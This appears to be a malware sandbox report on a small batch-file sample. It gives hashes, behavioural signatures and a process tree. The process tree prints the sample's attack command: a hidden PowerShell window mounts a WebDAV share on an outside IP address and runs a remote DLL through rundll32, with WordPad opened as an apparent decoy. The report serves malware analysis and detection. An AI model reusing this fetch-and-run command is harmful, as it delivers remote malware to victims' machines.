Analysis
- max time kernel: 122s
- max time network: 124s
- platform: windows7_x64
- resource: win7-20240705-en
- resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
- submitted: 15/07/2024, 06:05
Static task: static1
Behavioral task: behavioral1
- Sample: 1969732479259286114.bat
- Resource: win7-20240705-en
- 7 signatures
- 150 seconds
Behavioral task: behavioral2
- Sample: 1969732479259286114.bat
- Resource: win10v2004-20240709-en
- 8 signatures
- 150 seconds
General
- Target: 1969732479259286114.bat
- Size: 2KB
- MD5: 727e7529433f7aa759bc70a3a19526f5
- SHA1: c9d29f4e470df3b65cd73d8dde52c4967b9a2ea9
- SHA256: bb58d6217b5098bffcf750f1d6c51d6cf4d0d10de4df89e3e88fdb813b87f266
- SHA512: b2873627be5e0dc32eab95978ee0590cf245ac25f4ac80b6a30e75e5c395bb23aaa9212ea0e79becf8d7363cc1dfa8ca1cde126320060126d77fe19235f4325f
- Score: 8/10
Malware Config
Signatures
- Command and Scripting Interpreter: PowerShell (1 TTP, 1 IoC)
  Run PowerShell and hide display window.
  pid 2236, process powershell.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Runs net.exe
- Suspicious behavior: EnumeratesProcesses (1 IoC)
  pid 2236, process powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  description: Token: SeDebugPrivilege; pid 2236, process powershell.exe
- Suspicious use of SetWindowsHookEx (5 IoCs)
  pid 824, process wordpad.exe
  pid 824, process wordpad.exe
  pid 824, process wordpad.exe
  pid 824, process wordpad.exe
  pid 824, process wordpad.exe
- Suspicious use of WriteProcessMemory (12 IoCs)
  description                        pid   Process         procid_target
  PID 2308 wrote to memory of 824    2308  cmd.exe         31
  PID 2308 wrote to memory of 824    2308  cmd.exe         31
  PID 2308 wrote to memory of 824    2308  cmd.exe         31
  PID 2308 wrote to memory of 2236   2308  cmd.exe         32
  PID 2308 wrote to memory of 2236   2308  cmd.exe         32
  PID 2308 wrote to memory of 2236   2308  cmd.exe         32
  PID 2236 wrote to memory of 2676   2236  powershell.exe  34
  PID 2236 wrote to memory of 2676   2236  powershell.exe  34
  PID 2236 wrote to memory of 2676   2236  powershell.exe  34
  PID 2236 wrote to memory of 2532   2236  powershell.exe  35
  PID 2236 wrote to memory of 2532   2236  powershell.exe  35
  PID 2236 wrote to memory of 2532   2236  powershell.exe  35
Processes
- C:\Windows\system32\cmd.exe (depth 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\1969732479259286114.bat"
  PID: 2308
  - Suspicious use of WriteProcessMemory
  - C:\Program Files\Windows NT\Accessories\wordpad.exe (depth 2)
    Command line: "C:\Program Files\Windows NT\Accessories\wordpad.exe"
    PID: 824
    - Suspicious use of SetWindowsHookEx
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
    Command line: powershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\2811.dll,entry
    PID: 2236
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\net.exe (depth 3)
      Command line: "C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\
      PID: 2676
    - C:\Windows\system32\rundll32.exe (depth 3)
      Command line: "C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\2811.dll entry
      PID: 2532